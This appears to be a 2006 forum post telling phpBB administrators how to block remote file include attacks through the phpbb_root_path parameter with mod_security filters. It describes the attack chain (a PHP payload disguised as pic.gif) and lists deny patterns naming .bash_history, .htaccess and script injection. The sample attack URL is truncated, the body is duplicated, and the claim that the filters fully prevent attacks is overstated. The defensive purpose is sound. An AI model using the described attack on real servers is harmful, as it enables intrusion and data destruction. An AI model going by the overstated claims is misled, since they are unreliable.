Here's what the hacker is putting in the URL
Posted: Thu Sep 07, 2006 7:03 pmIn addition to applying Michaelo's fixes. You should also install mod_security. And include the filters listed below in this post. One of the filters is for phpbb_root_path. This phpbb_root_path variable is in several files located in your /includes folder which hackers are exploiting. If you add phpbb_root_path to your mod_security filters, this will stop all attacks on your server which attempt to use this exploit, as mod_security will reply with a 406 Access Denied error everytime the hackers try to break into your server.
Here's an example of a hack attempt that mod_security will pick up and deny. Notice the phpbb_root_path variable in the string.
/functions.php?phpbb_root_path=http]Remote File Include[/u] attack. It tells your server to upload a malicious file called pic.gif to your server's /tmp directory.
In this case pic.gif is not actually a gif file, but rather a PHP file with php commands hidden inside the file and renamed with a .gif extension.
The hacker then establishes an IRC connection to your server to access this file and execute it, which will then give him/her full access to files on your server to edit files with code that says "this site has been hacked" etc, or to just simply delete all files on your server.
To fully prevent this, simply install mod_security and include the following filter in your mod_security config file. If you don't have a dedicated server, just ask your host to install mod_security for you and tell them to copy in these lines. If they already have it installed then ask them to copy in these lines (also included are filters for other common attacks such as union and clicke).
[quote]<IfModule>
SecFilterEngine On
SecFilterScanPOST On
SecFilterCheckURLEncoding On
SecFilterForceByteRange 0 255
SecAuditEngine RelevantOnly
SecAuditLog logs/audit_log
SecFilterDebugLog logs/modsec_debug_log
SecFilterDebugLevel 0
SecFilterDefaultAction "deny,log,status:406"
SecFilterSelective REMOTE_ADDR "^127.0.0.1$" nolog,allow
Include "/usr/local/apache/conf/modsec.user.conf"
</IfModule>
SecFilterSelective THE_REQUEST ".htgroup"
SecFilterSelective THE_REQUEST "phpbb_root_path"
SecFilterSelective THE_REQUEST ".htaccess"
SecFilterSelective THE_REQUEST "cd.."
SecFilterSelective THE_REQUEST "///cgi-bin"
SecFilterSelective THE_REQUEST "/cgi-bin///"
SecFilterSelective THE_REQUEST "/~root"
SecFilterSelective THE_REQUEST "/~ftp"
SecFilterSelective THE_REQUEST "/htgrep" chain
SecFilterSelective THE_REQUEST "/htgrep" log,pass
SecFilterSelective THE_REQUEST "/.history"
SecFilterSelective THE_REQUEST "/.bash_history"
SecFilterSelective THE_REQUEST "/~nobody"
SecFilterSelective THE_REQUEST "<script>
If Mod_security is installed, it will stop this kind of attack provided that you use the filters I posted above, and that you have the SecFilterScanPOST set to On, i.e
SecFilterScanPOST On
It will also stop malicious GET payloads sent directly via the URL.
Here's an example of a hack attempt that mod_security will pick up and deny. Notice the phpbb_root_path variable in the string.
/functions.php?phpbb_root_path=http]Remote File Include[/u] attack. It tells your server to upload a malicious file called pic.gif to your server's /tmp directory.
In this case pic.gif is not actually a gif file, but rather a PHP file with php commands hidden inside the file and renamed with a .gif extension.
The hacker then establishes an IRC connection to your server to access this file and execute it, which will then give him/her full access to files on your server to edit files with code that says "this site has been hacked" etc, or to just simply delete all files on your server.
To fully prevent this, simply install mod_security and include the following filter in your mod_security config file. If you don't have a dedicated server, just ask your host to install mod_security for you and tell them to copy in these lines. If they already have it installed then ask them to copy in these lines (also included are filters for other common attacks such as union and clicke).
[quote]<IfModule>
SecFilterEngine On
SecFilterScanPOST On
SecFilterCheckURLEncoding On
SecFilterForceByteRange 0 255
SecAuditEngine RelevantOnly
SecAuditLog logs/audit_log
SecFilterDebugLog logs/modsec_debug_log
SecFilterDebugLevel 0
SecFilterDefaultAction "deny,log,status:406"
SecFilterSelective REMOTE_ADDR "^127.0.0.1$" nolog,allow
Include "/usr/local/apache/conf/modsec.user.conf"
</IfModule>
SecFilterSelective THE_REQUEST ".htgroup"
SecFilterSelective THE_REQUEST "phpbb_root_path"
SecFilterSelective THE_REQUEST ".htaccess"
SecFilterSelective THE_REQUEST "cd.."
SecFilterSelective THE_REQUEST "///cgi-bin"
SecFilterSelective THE_REQUEST "/cgi-bin///"
SecFilterSelective THE_REQUEST "/~root"
SecFilterSelective THE_REQUEST "/~ftp"
SecFilterSelective THE_REQUEST "/htgrep" chain
SecFilterSelective THE_REQUEST "/htgrep" log,pass
SecFilterSelective THE_REQUEST "/.history"
SecFilterSelective THE_REQUEST "/.bash_history"
SecFilterSelective THE_REQUEST "/~nobody"
SecFilterSelective THE_REQUEST "<script>
If Mod_security is installed, it will stop this kind of attack provided that you use the filters I posted above, and that you have the SecFilterScanPOST set to On, i.e
SecFilterScanPOST On
It will also stop malicious GET payloads sent directly via the URL.
